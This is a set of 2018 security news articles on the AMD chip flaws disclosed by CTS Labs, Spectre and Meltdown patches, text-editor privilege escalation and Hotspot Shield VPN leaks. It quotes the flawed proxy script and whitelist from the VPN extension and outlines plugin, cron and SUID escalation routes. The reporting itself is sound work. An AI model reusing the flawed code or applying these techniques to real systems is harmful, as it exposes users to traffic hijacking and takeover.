Intel’s new CPUs, both for data centers and PCs, will be redesigned to protect against Meltdown and Spectre Variant 2.

“We have redesigned parts of the processor to introduce new levels of protection through partitioning that will protect against both Variants 2 and 3. Think of this partitioning as additional ‘protective walls’ between applications and user privilege levels to create an obstacle for bad actors,” Krzanich explained.

These protections are expected to become available in the second half of the year with the release of Intel Xeon Scalable (Cascade Lake) and 8th Generation Intel Core processors.

“As we bring these new products to market, ensuring that they deliver the performance improvements people expect from us is critical. Our goal is to offer not only the best performance, but also the best secure performance,” Krzanich said.


Hackers Can Abuse Text Editors for Privilege Escalation
15.3.2018 securityweek
Vulnerebility

Several popular text editors can be leveraged for privilege escalation and their developers do not plan on taking any action to prevent abuse, according to SafeBreach, a company that specializes in simulating attacks and breaches.

Some text editors allow users to run third-party code and extend the application’s functionality through extensions. While this provides some benefits, an expert determined that it can also introduce security risks.

SafeBreach researcher Dor Azouri has analyzed the Sublime, Vim, Emacs, Gedit, pico and nano text editors, and found that only pico and its clone, nano, are not prone to abuse, mainly due to the fact that they offer only limited extensibility.

One part of the problem is that users — particularly on Linux servers — may often need to execute text editors with elevated privileges. If an attacker can plant malicious extensions in locations specific to the targeted text editor, their code will get executed with elevated privileges when the application is launched or when certain operations are performed.

Text editors allow privilege escalation

For an attack to work, the attacker needs to somehow hijack a legitimate user account that has regular privileges, which can be achieved through phishing, social engineering and other methods. In the case of a malicious insider, the vulnerability found by SafeBreach can be useful for executing code with elevated privileges if their permissions have been restricted by the system administrator to certain files and commands.

Depending on the targeted editor, the attacker needs to create specially crafted scripts or package files, and place them in specific plugin directories. In some cases, the hacker may need to create additional files and enable extensions in order for the attack to work, but this should not be difficult if they have access to a less-privileged account.

In the case of Emacs, for example, attackers simply need to add one line of code to the “init.el” file in order to get their code executed on startup. Azouri noted that editing the init file does not require root permissions. A report published on Thursday by SafeBreach details how privilege escalation can be achieved through each of the tested editors.

While there are no reports of malicious attacks abusing text editors for privilege escalation, incidents involving abuse of extensibility are not unheard of. For instance, Kite, which offers Python code enhancements and suggestions for several popular editors via extensions, drew criticism last year after integrating promotional links into its users’ coding apps.

SafeBreach also pointed to a couple of incidents related to npm packages that resulted in malicious code getting loaded and applications breaking. Azouri has described several possible scenarios involving post-exploitation techniques that can be leveraged to gain root access on Unix-like systems.

“Badly configured Cron jobs, that are a natural part in Unix-like systems, can be abused to get root access. In a similar manner to the technique we present, an attacker might find binaries in cron jobs which are writable, and modify them to his/her needs. They are then executed as root by the OS (or other users, depending on the cron job settings), giving the attacker privileged execution,” Azouri told SecurityWeek.

Another example involves exploiting file permissions, such as special SUID executables. “SUID is a feature in Unix-like systems that allows configuring some executables to run as a specific user (the owner of the file). Finding a file that is owned by root and is set with SUID, can give a way for an attacker to get privileged execution,” the researcher said.

He added, “Some cases exist where the developers of 3rd party plugins, after gaining popularity for their plugin, updated the plugin's code with malicious code (either intentionally or unintentionally, the latter can be as a result of getting hacked and the attacker obtained access to the codebase). This update was downloaded by the plugin users, and then executed without them being aware of the malicious change.”

The developers of the text editors analyzed by SafeBreach said they don’t plan on making any changes to prevent this type of abuse. Vim developers admitted that they can take measures, but they appear to believe that it’s the user’s responsibility to defend against these attacks.

Emacs developers will not make any changes to their application due to the fact that this type of privilege escalation can leverage many apps and releasing a patch on their end would not completely address the issue.

Gedit has yet to confirm SafeBreach’s findings and Sublime has not provided researchers any updates after acknowledging their bug report.


CTS Labs Provides Clarifications on AMD Chip Flaws
15.3.2018 securityweek
Vulnerebility

As a result of massive backlash from the industry, Israel-based security firm CTS Labs has provided some clarifications about the recently disclosed AMD processor vulnerabilities and its disclosure method.

CTS Labs this week published a report providing a brief description of 13 critical vulnerabilities and backdoors found in EPYC and Ryzen processors from AMD. The flaws can allegedly be exploited for arbitrary code execution, bypassing security features, stealing data, helping malware become resilient against security products, and damaging hardware.

The vulnerabilities affect AMD’s Secure Processor, an environment where critical tasks are executed in order to secure the storage and processing of sensitive data and applications. The flaws have been dubbed MASTERKEY, RYZENFALL, FALLOUT and CHIMERA, and exploiting them requires elevated privileges to the targeted machine.

AMD was only notified 24 hours before the vulnerabilities were disclosed, but no technical details have been published in order to prevent exploitation for malicious purposes.

CTS Labs was only launched recently and its founders’ work experience has raised some questions. This, combined with the lack of technical details in the report has made many people doubt that the vulnerabilities exist or that they are as critical as the company claims.

However, Dan Guido, CEO of Trail of Bits, and Alex Ionescu, a reputable researcher and Windows security expert, have confirmed CTS Labs’ findings after reviewing technical information provided by the company. Guido was paid to review the work, but Ionescu said he wasn’t.

CTS Labs has come under fire for not giving AMD time to release patches before its disclosure. A disclaimer from the firm and a report from a controversial company named Viceroy Research suggest that the existence of the vulnerabilities was made public as part of an investment strategy, similar to the 2016 incident involving MedSec, Muddy Waters and St. Jude Medical.

In response to criticism, CTS Labs CTO Ilia Luk-Zilberman argued that the company’s approach to “responsible disclosure” is more beneficial for the public. He proposes that instead of notifying vendors and giving them a certain amount of time to release patches before disclosing full technical details, researchers should notify the public and the vendor at the same time without ever making technical details public, unless the flaws have been patched.

Luk-Zilberman admitted that CTS should have asked several third-parties to confirm its findings before going public in order to convince everyone that their claims are true.

While the CTO’s argument might make sense, many members of the industry are not convinced, particularly due to CTS’s disclaimer claiming that it may have, “either directly or indirectly, an economic interest in the performance of the securities [of AMD].” There is also the report from Viceroy, which attempts to persuade that “AMD is worth $0.00 and will have no choice but to file for Chapter 11 (Bankruptcy) in order to effectively deal with the repercussions of recent discoveries.”

CTS Labs has not provided any clarifications regarding its financial interests related to the disclosure.

Regardless of CTS Labs’ motives, Ionescu and Guido have confirmed the vulnerabilities and warned that they should not be ignored.

Alex Ionescu confirms vulnerabilities found by CTS in AMD processors

Dan Guido confirms vulnerabilities found by CTS in AMD processors

In an update posted on its AMDflaws.com website, CTS claimed that exploitation of the vulnerabilities does not require physical access; executing a file with local admin privileges on the targeted machine is enough.

“The only thing the attacker would need after the initial local compromise is local admin privileges and an affected machine,” CTS said. “To clarify misunderstandings -- there is no need for physical access, no digital signatures, no additional vulnerability to reflash an unsigned BIOS. Buy a computer from the store, run the exploits as admin -– and they will work.”

After the news broke, AMD told customers and the media that it’s investigating CTS Labs’ claims.

AMD is one of the major processor makers affected by Meltdown and Spectre, and while the company has confirmed that the flaws impact some of its products, it has insisted that the risk of attacks is small.


VPN leaks affect 3 Major VPN vendors, only Hotspot Shield promptly fixed it
15.3.2018 securityaffairs
Vulnerebility

The website VPNMentor discovered that IP leak issues in three major VPN vendors, only Hotspot Shield VPN promptly fixed it.
The website VPNMentor decided to hire a group of hackers to test popular virtual private networks (VPN) for vulnerabilities that can pose risk for the users.

The results of the tests revealed that the solutions evaluated by the white hat hackers suffer severe privacy-leak issues, any of the tested solutions don’t totally protect users’ IP from prying eyes.

Don’t forget that such kind of flaws in VPNs software could be exploited by governments and hostile organizations to spy track individuals online.

Paulos Yibelo, a researcher at Cure53 aka Filedescriptor, and an anonymous colleague were tasked by VPNMentor to test the Pure VPN, Zenmate, and Hotspot Shield VPN solutions.

“We tested 3 popular VPNs: Hotspot Shield, PureVPN, and Zenmate with accredited researchers to find if the VPNs could leak data. While we hoped to find zero leaks, we regretfully found that all of them leak sensitive data.” reads a blog post published by VPNMentor.

The good news is that once reported the issued to the development teams behind the three VPN solutions, one of them, Hotspot Shield, promptly released a fix to address the issues. The other vendors still haven’t replied to VPNMentor, for this reason, the website decided the publicly disclose the results of the tests only for Hotspot Shield waiting other for fixing the flaws.

The vulnerabilities in Hotspot Shield affect the Chrome extension for the solution, meanwhile, the desktop and mobile applications are secure.

The first vulnerability tracked as CVE-2018-7879, allowed an attacker to hijack a user’s traffic when he is tricked into visiting a malicious site.

“We observed the following PAC script used in Hotspot Shield Chome extension:

```
function FindProxyForURL(url, host) {
if(url.indexOf('act=afProxyServerPing') != -1) {
let parsed = url.match(/act=afProxyServerPing&server=([^&]+)/);
if(parsed && parsed[1]) return 'https '+parsed[1]+':443; DIRECT;';
}
```

It detects if the current URL has the query parameter act=afProxyServerPing, and if it does, it routes all traffic to the proxy hostname provided by the server parameter.”

VPN hotspot shield proxy_hijack

That issue seems to be related to internal test code that was not removed, it fails to validate what host is making this “call”.

An attacker could craft a link with those parameters in an effort to redirect the traffic to a proxy server controlled by the attackers.

The IP leak is caused by whitelist used by the extension for “direct connection”.

let whiteList = /localhost|accounts\.google|google\-analytics\.com|chrome\-signin|freegeoip\.net|event\.shelljacket|chrome\.google|box\.anchorfree|googleapis|127\.0\.0\.1|hsselite|firebaseio|amazonaws\.com|shelljacket\.us|coloredsand\.us|ratehike\.us|pixel\.quantserve\.com|googleusercontent\.com|easylist\-downloads\.adblockplus\.org|hotspotshield|get\.betternet\.co|betternet\.co|support\.hotspotshield\.com|geo\.mydati\.com|control\.kochava\.com/;if(isPlainHostName(host) || shExpMatch(host, '*.local') || isInNet(ip, '10.0.0.0', '255.0.0.0') || isInNet(ip, '172.16.0.0', '255.240.0.0') || isInNet(ip, '192.168.0.0', '255.255.0.0') || isInNet(ip, '173.37.0.0', '255.255.0.0') || isInNet(ip, '127.0.0.0', '255.255.255.0') || !url.match(/^https?/) || whiteList.test(host) || url.indexOf('type=a1fproxyspeedtest') != -1) return 'DIRECT';
The tests revealed that any domain that includes localhost in the URL bypasses the proxy (for example, localhost.foo.bar.com), such as any URL with type=a1fproxyspeedtest.

To prove the IP leak the hackers visited the site with the unpatched version of Hotspot Shield.

VPN hotspot shield ip_leak

For now, the details about bugs in Zenmate and VPN Shield are being kept under wraps because those vendors haven’t responded to VPN Mentor. Both leaked user IPs.

Experts confirmed that both PureVPN’s and ZenMate’s vulnerabilities could be currently exploited to unmask VPN users.

“If you are a user of Zenmate or PureVPN, contact the support team and ask for the vulnerabilities to be fixed ASAP”, the post said.


What’s new in Microsoft Patch Tuesday updates for March 2018?
15.3.2018 securityaffairs
Vulnerebility

Microsoft Patch Tuesday updates for March 2018 – Microsoft released security updates for 75 security flaws, 14 of them listed as Critical and 61 are rated Important in severity.
Microsoft Patch Tuesday updates for March 2018 address 75 vulnerabilities, all the critical flaws fixed this month affect the Internet Explorer and Edge web browsers.

Most of the critical vulnerabilities are remote code execution flaws that are related to the way browser scripting engines handle objects in memory.

One of the critical vulnerabilities fixed by the Microsoft Patch Tuesday can lead to the disclosure of information that can be leveraged to further hack the targeted system.

Two vulnerabilities fixed this month, a denial-of-service (DoS) issue in ASP.NET 2.0 (CVE-2018-0808) and a privilege escalation in Microsoft Exchange Server 2010 through 2016 editions (CVE-2018-0940), have been publicly disclosed before patches became available, but according to Microsoft, there is no news about their exploitation in the wild.

Microsoft also fixed a privilege escalation vulnerability that resides in the Windows installer and that could be exploited by an authenticated attacker to run arbitrary code with elevated permissions.

A remote code execution vulnerability exists in the Credential Security Support Provider protocol (CredSSP).

One of the most debated issues fixed by Microsoft is the CredSSP Remote Code Execution Vulnerability (CVE-2018-0886) that affects all versions of Windows to date.

The flaw could be used by a remote attacker to exploit RDP (Remote Desktop Protocol) and Windows Remote Management (WinRM) to steal data and run malicious code.

The vulnerability is a logical cryptographic issue in CredSSP that can be exploited by an attacker in a man-in-the-middle position to steal session authentication data and perform a Remote Procedure Call attack.

Microsoft Patch Tuesday updates for March 2018

The Microsoft Patch Tuesday updates for March 2018 also addressed other vulnerabilities in:

Microsoft Office
.NET Core
PowerShell Core
Microsoft Hyper-V
Microsoft Windows
ChakraCore


Security Firm Under Fire Over Disclosure of AMD Chip Flaws
14.3.2018 securityweek
Vulnerebility

AMD is investigating claims that its processors are affected by more than a dozen serious vulnerabilities, and the company that found the flaws is facing backlash over its disclosure method.

Israel-based CTS Labs on Tuesday published a report claiming that it has found 13 critical vulnerabilities and backdoors in AMD’s EPYC, Ryzen, Ryzen Pro, and Ryzen Mobile processors over the course of six months. Only a high level description of the security holes has been made public, but AMD was informed of the flaws only one day before disclosure.

The vulnerabilities

CTS Labs has set up a dedicated website and assigned names to each type of vulnerability it has found. According to the company, the security holes mostly affect AMD’s Secure Processor technology and they can be exploited for arbitrary code execution, bypassing security features, stealing data, helping malware become resilient against security products, and damaging hardware.Vulnerabilities found in Ryzen and other AMD processors

The vulnerability class dubbed MASTERKEY by CTS Labs can reportedly be exploited to deploy persistent malware inside the AMD Secure Processor, but exploitation involves installing a malicious BIOS update. These flaws can be used to bypass firmware and software security features, including the Firmware Trusted Platform Module (FTPM), Secure Encrypted Virtualization (SEV), Windows Defender Credential Guard, and Microsoft’s Virtualization-based Security (VBS) technologies. MASTERKEY can be leveraged to steal network credentials and cause physical damage to targeted devices, CTS said.

The RYZENFALL vulnerabilities, which affect Ryzen processors from AMD, in the worst case scenario, can be exploited to take complete control of the Secure Processor. Attackers can leverage this to plant malware that cannot be removed by traditional security solutions, researchers said.

FALLOUT vulnerabilities affect the boot loader component of the Secure Processor in EPYC CPUs. Exploitation requires a digitally-signed driver supplied by the vendor. Attackers can leverage FALLOUT to plant highly persistent malware, disable BIOS protections, steal network credentials, and bypass security mechanisms.

The last class of vulnerabilities has been dubbed CHIMERA. These are backdoors in AMD’s Promontory chipsets, which are used in Ryzen and Ryzen Pro workstations. The backdoors, found in both the firmware and the hardware, can be exploited to execute malicious code inside the chipset’s internal processor, CTS said. These backdoors were reportedly introduced by ASUS subsidiary ASMedia.

Exploitation of all the vulnerabilities requires elevated privileges to the targeted machine.

Impact and comparison to Meltdown/Spectre

Security firm enSilo, which published an FAQ shortly after CTS Labs made available its report, compared the vulnerabilities to Meltdown and Spectre, which impact CPUs from Intel, AMD, ARM and others. However, some argued that the issues disclosed by CTS Labs are nowhere near as severe due to the fact that they mostly impact AMD’s Secure Processor technology rather than the hardware itself.

Dan Guido, CEO of Trail of Bits, said his company reviewed CTS Labs’ technical report and confirmed that the vulnerabilities exist and that the proof-of-concept (PoC) exploits work, but admitted that all flaws require administrator privileges for exploitation. Trail of Bits was paid by CTS Labs to review the findings.

Researcher Arrigo Triulzi‏ called CTS’s report “over-hyped beyond belief” and a “whitepaper worthy of an ICO.” Triulzi‏ pointed out that if an attacker obtains elevated privileges and is able to perform malicious BIOS updates and load unauthorized code, they would not need to exploit these vulnerabilities in order to gain complete control over a system.

Triulzi‏ admitted that the CHIMERA vulnerability could pose a problem, but only “if you are a government agency.” CTS noted in its report that it may not be possible to directly fix this bug, and it may require a workaround or a recall of the product.

Controversial disclosure

AMD was only given one day to prepare for CTS Labs’ disclosure and the company says it has launched an investigation. Vendors are typically given months to fix or mitigate these types of flaws; in the case of Meltdown and Spectre, affected companies were given roughly half a year to work on patches.

“This company was previously unknown to AMD and we find it unusual for a security firm to publish its research to the press without providing a reasonable amount of time for the company to investigate and address its findings,” AMD stated.

While CTS Labs has not released any details and claims no technical information will be made available any time soon to prevent abuse, its methods have been called into question.

“The way that CTS Labs chose to publicly identify vulnerabilities they discovered in AMD chips is a case study in what not to do when you discover a software or hardware weakness in the wild,” Jon Bottarini, Technical Program Manager at HackerOne, told SecurityWeek. “Responsible disclosure should be the prime directive for security researchers, and by only allowing AMD 24 hours to respond before CTS Labs notified the press, CTS stood to do more harm than good.”

Many potentially serious vulnerabilities have been found in similar Intel technologies over the past year, but in most cases they were responsibly disclosed to Intel and the company started working on patches before disclosure.

On the other hand, CTS’s unorthodox disclosure method may have been driven by financial motives.

“Although we have a good faith belief in our analysis and believe it to be objective and unbiased, you are advised that we may have, either directly or indirectly, an economic interest in the performance of the securities of the companies whose products are the subject of our reports,” CTS Labs noted in its report.

A controversial company named Viceroy Research published its own report following CTS Labs’ disclosure in an apparent effort to short AMD stock.

“In light of CTS’s discoveries, the meteoric rise of AMD’s stock price now appears to be totally unjustified and entirely unsustainable. We believe AMD is worth $0.00 and will have no choice but to file for Chapter 11 (Bankruptcy) in order to effectively deal with the repercussions of recent discoveries,” Viceroy Research said.

In addition to the findings, some have called into question the credibility of CTB Labs, a company founded in 2017, and its founders’ claims regarding other firms they launched and worked for.

This would not be the first time a report describing vulnerabilities in a product is used as part of an investment strategy. In 2016, investment research firm Muddy Waters used a report from medical cybersecurity firm MedSec to short-sell St. Jude Medical.


Microsoft Releases More Patches for Meltdown, Spectre
14.3.2018 securityweek
Vulnerebility

Microsoft informed users on Tuesday that it released additional patches for the CPU vulnerabilities known as Meltdown and Spectre, and removed antivirus compatibility checks in Windows 10.

Meltdown and Spectre allow malicious applications to bypass memory isolation and access sensitive data. Meltdown attacks are possible due to CVE-2017-5754, while Spectre attacks are possible due to CVE-2017-5753 (Variant 1) and CVE-2017-5715 (Variant 2). Meltdown and Spectre Variant 1 can be resolved with software updates, but Spectre Variant 2 requires microcode patches.

In addition to software mitigations, Microsoft recently started providing microcode patches as well. It initially delivered Intel’s microcode updates to devices running Windows 10 Fall Creators Update and Windows Server 2016 (1709) with Skylake processors.

Now that Intel has developed and tested patches for many of its products, Microsoft has also expanded the list of processors covered by its Windows 10 and Windows Server 2016 updates. Devices with Skylake, Coffee Lake and Kaby Lake CPUs can now receive the microcode updates from Intel via the Microsoft Update Catalog.

Microsoft also informed customers on Tuesday that software patches for the Meltdown vulnerability are now available for x86 editions of Windows 7 and Windows 8.1.

The company has also decided to remove the antivirus compatibility checks in Windows 10. The decision to introduce these checks came after the tech giant noticed that some security products had created compatibility issues with the Meltdown patches. This resulted in users not receiving security updates unless their AV vendor made some changes.

Microsoft has determined that this is no longer an issue on Windows 10 so the checks have been removed. On other versions of the operating system, users will still not receive updates if their antivirus is incompatible.

Microsoft’s Patch Tuesday updates for March 2018 fix over 70 flaws, including more than a dozen critical bugs affecting the company’s Edge and Internet Explorer web browsers.


Microsoft Patches Remote Code Execution Flaw in CredSSP
14.3.2018 securityweek
Vulnerebility

A vulnerability (CVE-2018-0886) patched by Microsoft with its March 2018 security patches was a remote code execution flaw in the Credential Security Support Provider protocol (CredSSP) used by Remote Desktop Protocol (RDP) and Windows Remote Management (WinRM).

This vulnerability can be exploited by an attacker to relay user credentials to execute code on a target system. The authentication provider, Microsoft explains, processes authentication requests for other applications, meaning that the vulnerability puts all applications that depend on CredSSP at risk.

Preempt, which discovered the bug, explains that this is a logical vulnerability that affects all Windows versions to date. With almost all enterprise customers using RDP, exploitation of this vulnerability could have a vast impact, the researchers say.

Cybercriminals can set up a man-in-the-middle attack, wait for a CredSSP session, and then steal session authentication to perform a Remote Procedure Call (DCE/RPC) attack on the server the user attempted to connect to.

Chris Morales, head of security analytics at Vectra, pointed out to SecurityWeek in an emailed comment that this type of activity could rather be considered a form of internal reconnaissance that any company properly monitoring their internal environment should be able to detect.

“In the big picture, there are a lot of variables that have to be right in a targeted environment for this attack to succeed. Most importantly, the attacker needs to already be on the network and in a position between the clients and servers. If an attacker is already that deep in the network, there are many other things they could do scope out a network, find authentication accounts and compromise a server,” Morales said.

Once they managed to steal the session, the attacker can run commands to install programs, read / modify / delete data, or create new accounts with full user rights.

Scenarios in which the vulnerability can be exploited include those where the attacker has some physical access to the targeted network, those where Address Resolution Protocol (ARP) poisoning is used for lateral movement, or those where the attacker is targeting sensitive servers via vulnerable routers or switches, Preempt says. The company also published a video detailing the vulnerability.

“To be fully protected against this vulnerability users must enable Group Policy settings on their systems and update their Remote Desktop clients. The Group Policy settings are disabled by default to prevent connectivity problems,” Microsoft explains.

The vulnerability impacts Windows 7, Windows 8.1, and Windows 10 systems, as well as Windows Server 2008, Windows Server 2012, and Windows Server 2016.

To address the issue, Microsoft released an update to correct the manner in which CredSSP validates requests during the authentication process. The update patches the CredSSP authentication protocol and the Remote Desktop clients for all affected platforms.

“Mitigation consists of installing the update on all eligible client and server operating systems and then using included Group Policy settings or registry-based equivalents to manage the setting options on the client and server computers. We recommend that administrators apply the policy and set it to “Force updated clients” or “Mitigated” on client and server computers as soon as possible,” Microsoft says.

The software giant also explains that this patch is only the first update it is releasing to address the issue. An update planned for next month should “enhance the error message that is presented when an updated client fails to connect to a server that has not been updated,” while another planned for May should “change the default setting from Vulnerable to Mitigated.”

The company also urges admins to check a compatibility table it published on Tuesday and pay close attention to Group Policy or registry settings pairs that result in “Blocked” interactions between clients and servers.

“Vulnerabilities, like this CredSSP issue that Microsoft is fixing today, become yet another example of how dangerous it can be to rely on security or administration tools without locking them down with hardened configurations. RDP is a widely used tool, but, as this exploit shows, a Man-in-the-Middle attack makes the use of this tool especially dangerous if the user is logging in with an administrator credential of any sort,” Nathan Wenzler, chief security strategist at AsTech, told SecurityWeek in an emailed comment.

“It’s imperative that admins and security practitioners are doing more to reduce the amount of privileged access their administrators possess, that tools such as RDP are disabled if they're not being used, and doing whatever else they can to limit the amount of administrator-level exposure that an attacker might be able to compromise anywhere along the chain and then use to wreak havoc on the rest of the network,” Wenzler concluded.


SAP Patches Decade-Old Flaws With March 2018 Patches
14.3.2018 securityweek
Vulnerebility

SAP this week released its March 2018 set of security patches to address High and Medium priority vulnerabilities in its products.

A total of 10 Security Notes were included in the SAP Security Patch Day this month, three rated High priority and 7 considered Medium priority. Two of the Notes were updates for previously released Security Notes.

SAP this month included 17 Support Package Notes in the Security Patch Day, for a total of 17 Security Notes, ERPScan (a company that specializes in securing Oracle and SAP applications) reports. 11 of the Notes were released after the second Tuesday of the last month and before the second Tuesday of this month.

The most severe of the Security Notes addresses three vulnerabilities in SAP Internet Graphics Server (IGS) and carries a High priority rating (CVSS Base Score: 8.8). The bugs include CVE-2004-1308 (memory corruption), CVE-2005-2974 (denial of service), and CVE-2005-3350 (remote code execution).

The vulnerabilities, which have been around for over a decade, impact libtiff, giflib and libpng, three third-party open source libraries that handle images (TIFF, GIF and PNG, respectively).

The use of open source software isn’t new and provides lots of advantages, especially since many open source libraries have been tried and tested. However, not all of them should be taken for granted, and software companies such as SAP should always keep their programs up-to-date to eliminate any possible bugs.

“Open source libraries used in commercial products are necessary to maintain quality; however, it should be clear that there is a gray area, in which trust is assumed but never received,” Onapsis (another company focused on securing Oracle and SAP products) points out.

This month, SAP also addressed two High risk information disclosure vulnerabilities impacting SAP HANA capture & replay trace file (CVE-2018-2402 - CVSS Base Score: 7.6) and SAP Business Process Automation (BPA) by Redwood (CVE-2018-2400 - CVSS Base Score: 7.5).

Of all 27 SAP Security Notes, 6 have a High priority rating and 19 are rated Medium priority. 4 of all the patches are updates to previously released Security Notes.

The most common type of vulnerability addressed this month is missing authorization check, with 6, followed by information disclosure at 5, and Cross-Site Scripting at 4. SAP also addressed 3 SQL injection bugs, 2 directory traversal issues, 2 implementation flaws, and denial of service, hardcoded credentials, XML external entity, code injection, and clickjacking bugs.


Researchers Find Critical Security Flaws in AMD Chips
14.3.2018 securityweek
Vulnerebility

Security researchers said Tuesday they discovered flaws in chips made by Advanced Micro Devices that could allow hackers to take over computers and networks.

Israeli-based security firm CTS Labs published its research showing "multiple critical security vulnerabilities and exploitable manufacturer backdoors" in AMD chips.

CTS itemized 13 flaws, saying they "have the potential to put organizations at significantly increased risk of cyberattacks."

The report comes weeks after Intel disclosed similar hardware-based flaws dubbed Meltdown and Spectre, sparking widespread computer security concerns and a congressional inquiry.

CTS said the newly discovered flaws could compromise AMD's new chips that handle applications in the enterprise, industrial and aerospace sectors, as well as consumer products.

In a 20-page white paper, the researchers said the AMD Secure Processor, the gatekeeper responsible for the security of AMD processors, contains "critical vulnerabilities" that "could allow malicious actors to permanently install malicious code inside the Secure Processor itself."

"These vulnerabilities could expose AMD customers to industrial espionage that is virtually undetectable by most security solutions," the researchers said.

CTS said AMD's Ryzen chipset, which AMD outsourced to a Taiwanese chip manufacturer, ASMedia, "is currently being shipped with exploitable manufacturer backdoors inside."

This could allow attackers "to inject malicious code into the chip" and create "an ideal target" for hackers, the researchers said.

"CTS believes that networks that contain AMD computers are at a considerable risk," the report said.

"The vulnerabilities we have discovered allow bad actors who infiltrated the network to persist in it, surviving computer reboots and reinstallations of the operating system.

"This allows attackers to engage in persistent, virtually undetectable espionage, buried deep in the system."

AMD, one of the largest semiconductor firms specializing in processors for PCs and servers, said it was studying the latest report. "At AMD, security is a top priority and we are continually working to ensure the safety of our users as new risks arise," the California-based company said in a statement.

"We are investigating this report, which we just received, to understand the methodology and merit of the findings."

Analysts at the security firm enSilo said the AMD flaws could be worse than those affecting Intel chips.

"The impact of these vulnerabilities is more severe than Meltdown/Spectre as it allows an attacker to execute highly privileged code and persist on the victim machine," enSilo said in a blog post.

Additionally, some of the flaws may be nearly impossible to patch.

"We estimate that without patches from AMD, protection against the vulnerabilities can be limited at best," enSilo researchers said. "The best protection is to block malware that attempts to leverage these vulnerabilities."


Microsoft Patches Over Dozen Critical Browser Flaws
14.3.2018 securityweek
Vulnerebility

Microsoft’s Patch Tuesday updates for March 2018 fix a total of 75 vulnerabilities, including more than a dozen critical flaws affecting the company’s Edge and Internet Explorer web browsers.

All the security holes rated critical this month affect the web browsers. A vast majority of the issues have been described as remote code execution flaws that exist due to the way browser scripting engines handle objects in memory.

The only critical vulnerability that cannot be exploited for arbitrary code execution can lead to disclosure of information that can be leveraged to further hack the targeted system.

Two of the flaws patched by Microsoft have been publicly disclosed before patches became available, but they are only rated as “important,” and there is no evidence of malicious exploitation. These bugs are a denial-of-service (DoS) issue in ASP.NET and a privilege escalation in Exchange.

The Zero Day Initiative (ZDI) pointed out that the Exchange vulnerability exists in the Outlook Web Access (OWA) component and it can be exploited for phishing attacks.

Another interesting privilege escalation flaw affects the Windows installer and it allows an authenticated attacker to run arbitrary code with elevated permissions.

“At first glance, this doesn’t seem very crucial since an attacker would need the ability to run programs on a target system to exploit this vulnerability,” ZDI said in a blog post. “However, this type of bug is often used by malware authors to “piggyback” their malicious code on top of innocuous code. It’s always easier to convince someone to install ‘GreatNewGame.exe’ instead of ‘EvilMalware.exe’.”

Another noteworthy vulnerability is CVE-2018-0886, a remote code execution bug affecting the Credential Security Support Provider (CredSSP) protocol. In addition to applying Microsoft’s patch, users also need to make some settings changes in order to fully mitigate potential attacks.

Microsoft’s latest security updates also patch vulnerabilities in Hyper-V, Access, Identity Manager, SharePoint, and Windows. The company has also updated the Flash Player components present in its products to address a couple of flaws fixed on Tuesday by Adobe.


Adobe Patches Critical Code Execution Flaws in Dreamweaver, Flash
14.3.2018 securityweek
Vulnerebility

Security updates released by Adobe on Tuesday patch several vulnerabilities in the company’s Dreamweaver, Flash Player and Connect products.

Flash Player 29.0.0.113 for Windows, Mac, Linux and Chrome OS addresses two critical flaws affecting versions 28.0.0.161 and earlier.

The vulnerabilities have been described as a use-after-free bug (CVE-2018-4919) and a type confusion issue (CVE-2018-4920), both of which can be exploited for remote code execution. While they have been classified as critical, Adobe has assigned them a priority rating of “2,” which indicates that the company does not expect to see exploits any time soon.

The security holes were discovered by Yuki Chen of Qihoo 360 Vulcan Team, who reported them to Adobe via the Chromium Vulnerability Rewards Program.

In Dreamweaver CC, Adobe resolved a critical OS command injection vulnerability discovered by researcher Andrea Micalizzi, also known as “rgod.” The flaw is serious, but the product has never been targeted by hackers, at least to Adobe’s knowledge.

The flaw, CVE-2018-4924, affects versions 18.0 and earlier for Windows and it’s related to the Dreamweaver URI handler. An attacker can exploit the weakness for arbitrary code execution in the context of the current user.

The latest version of Adobe Connect patches two important vulnerabilities: an OS command injection flaw that can lead to arbitrary file deletion, and an unrestricted SWF file upload bug that can be exploited for cross-site scripting (XSS) attacks. Micalizzi and Ciaran McNally have been credited for finding the flaws.

Adobe was recently forced to release an out-of-band update for Flash Player after learning of a vulnerability that had been exploited in targeted attacks by a threat actor believed to be from North Korea.

Microsoft’s Patch Tuesday updates for this month fix over 70 vulnerabilities, including more than a dozen critical flaws affecting the Edge and Internet Explorer web browsers.


13 Critical flaws and exploitable backdoors found in various AMD chips
14.3.2018 securityaffairs 
Vulnerebility

Security researchers at Israel-based CTS-Labs have discovered 13 critical vulnerabilities and exploitable backdoors in various AMD chips.
The flaws could be potentially exploited to steal sensitive data, install malicious code on AMD-based systems, and gain full access to the compromised systems. The flaws expose servers, workstations, and laptops running vulnerable AMD Ryzen, Ryzen Pro, Ryzen Mobile or EPYC processors to attacks.

CTS-Labs promptly reported the flaws to AMD, Microsoft and “a small number of companies that could produce patches and mitigations.”

“We have just received a report from a company called CTS Labs claiming there are potential security vulnerabilities related to certain of our processors. We are actively investigating and analyzing its findings.” reads a statement published by AMD.

“This company was previously unknown to AMD and we find it unusual for a security firm to publish its research to the press without providing a reasonable amount of time for the company to investigate and address its findings. At AMD, security is a top priority and we are continually working to ensure the safety of our users as potential new risks arise.”

This analysis conducted by the experts revealed four classes (RYZENFALL, FALLOUT, CHIMERA, and MASTERKEY) of vulnerabilities affecting the AMD Zen architecture processors and chipsets that usually contain sensitive information such as passwords and encryption keys.

The flaw could allow to bypass AMD’s Secure Encrypted Virtualization (SEV) technology and also Microsoft Windows Credential Guard.

“The AMD Secure Processor, the gatekeeper responsible for the security of AMD processors, contains critical vulnerabilities. This integral part of most of AMD’s products, including workstations and servers, is currently being shipped with multiple security vulnerabilities that could allow malicious actors (“attackers”) to permanently install malicious code inside the Secure Processor itself.” reads the report published by the experts.

“These vulnerabilities could expose AMD customers to industrial espionage that is virtually undetectable by most security solutions”

The researchers also discovered two exploitable manufacturer backdoors inside Ryzen chipset that could be exploited to inject malicious code into the chip.

AMD flaws

The number of total products affected (Successfully Exploited) is 21, but the researchers believe that 11 more products are also vulnerable.

Dan Guido, the founder of security firm Trail of Bits, who was informed of the flaws before their public disclosure confirmed that existence of all 13 AMD vulnerabilities.

14h

Dan Guido
@dguido
So this http://AMDflaws.com business... CTS Labs asked us to review their research last week, and sent us a full technical report with PoC exploit code for each set of bugs.


Dan Guido
@dguido
Regardless of the hype around the release, the bugs are real, accurately described in their technical report (which is not public afaik), and their exploit code works.

7:36 PM - Mar 13, 2018
57
70 people are talking about this
Twitter Ads info and privacy
The vulnerabilities enable attackers to bypass security measures like Microsoft’s latest Credential Guard technology or EPYC Secure Processor’s Secure Encrypted Virtualization security feature.

